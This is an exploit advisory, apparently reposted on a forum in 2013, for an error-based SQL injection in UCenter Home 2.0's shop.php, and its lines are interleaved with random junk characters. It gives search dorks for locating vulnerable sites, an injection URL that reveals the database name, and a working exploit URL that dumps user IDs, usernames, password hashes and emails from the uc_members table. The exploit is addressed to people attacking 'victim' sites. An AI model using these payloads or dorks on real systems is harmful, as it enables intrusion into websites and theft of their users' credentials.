: L) F6 Y- b) V# a# v. i
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ - {5 [6 E A( g& ]/ d6 W5 A
5 a- Q5 j$ |8 `0 ^9 M: w( ~8 m4 S f! X) v& z% i. n; o+ v5 T
) c |; e" Y: j5 ~( v! [5 R! v*/ Author : KnocKout
) Y6 B1 v) @3 j, f
" H4 C6 d( s$ o( O; ]" v, w8 ?5 u*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
" \8 m1 u" W7 h w) E. K- X- m; W; o4 N y
*/ Contact: knockoutr@msn.com
, a" N9 t8 m* B6 r$ g' P. G5 P# s4 B' T; v( r; P1 I3 u- ~. N
*/ Cyber-Warrior.org/CWKnocKout * H7 S1 U! M3 e# ]) }
" P! A; g4 r% ?7 }__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== : E0 g: }+ ^, ] ?& z9 p3 H9 L
, V0 F/ @8 }0 d) k! ~Script : UCenter Home ; N. z" e+ p! d. o2 R; d" N; @0 S
# E9 I6 a& g1 qVersion : 2.0 ) q* a6 E1 l4 e
) O% x( l- [. `0 ?5 A% iScript HomePage : http://u.discuz.net/
( M) H" u9 R9 x9 s6 e- Y- Y e$ {/ N7 h
% I( P6 h0 M$ M; J" T; E__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
( |5 v' D! \8 c i
) F0 _0 M a* X! {3 f1 F! ^Dork : Powered by UCenter inurl:shop.php?ac=view
; Q( F0 K* B- o; T$ Z& O0 _( S |5 s4 Z( |5 S) N* h
Dork 2 : inurl:shop.php?ac=view&shopid= " T1 c2 r3 |# C4 t; m$ P' ]
( M5 ?, o% o! n) t__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== : F* [2 m9 q7 {& J: S+ H
9 w$ L% P/ ?) u0 w M
Vuln file : Shop.php
3 q( L, L7 s3 D2 x- |- J9 f' d. |' d) q) r
value's : (?)ac=view&shopid=
/ ^3 g: Q! O: p& g) K+ _1 |! A/ _1 D1 h
Vulnerable Style : SQL Injection (MySQL Error Based)
/ k3 _) K, q1 E4 S* u' W& U$ B) |7 i o( z0 u$ Q& A+ {
Need Metarials : Hex Conversion & H, r# t" K$ Z0 _8 O3 j9 [
+ d+ O. g' x1 e9 Q( _+ j
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
! Z3 }: L4 b' G. b: t1 ^! \9 E9 A1 W" V9 {: m
Your Need victim Database name. $ [9 _2 W* F4 D( [/ ?
( E, v- ? \! h. l& ~3 c0 Efor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ' B; ?' l& M% {1 i2 {5 a
8 H ?" ]8 P2 R: \/ p9 X, W% j
.. ) h7 R2 A# E, l B* B
% W* F5 |& O/ m) d( ]DB : Okey.
4 L- ?; K0 z. N; r" h; Q' n( i2 u) F8 E6 e
your edit DB `[TARGET DB NAME]` 0 s) T- H: ?' X) }( v
) c! l( v. t6 t7 U) w: RExample : 'hiwir1_ucenter' : z' s* a' p1 F0 i' s
* p* i7 [1 w' y* E' H2 Y7 eEdit : Okey. . M4 q6 b2 {0 J5 p
A5 n& r9 @; Z* r! ~* u
Your use Hex conversion. And edit Your SQL Injection Exploit.. ' k0 V( ?7 W# w: y: m" W
" f, n6 }1 u( v4 k
+ L( C' X6 x( i& x$ ^$ c" j
9 e, H( H% ?1 P4 BExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
. r! q9 J; J# c% f, r |
发表于 2013-2-27 21:31:31
收藏
支持
反对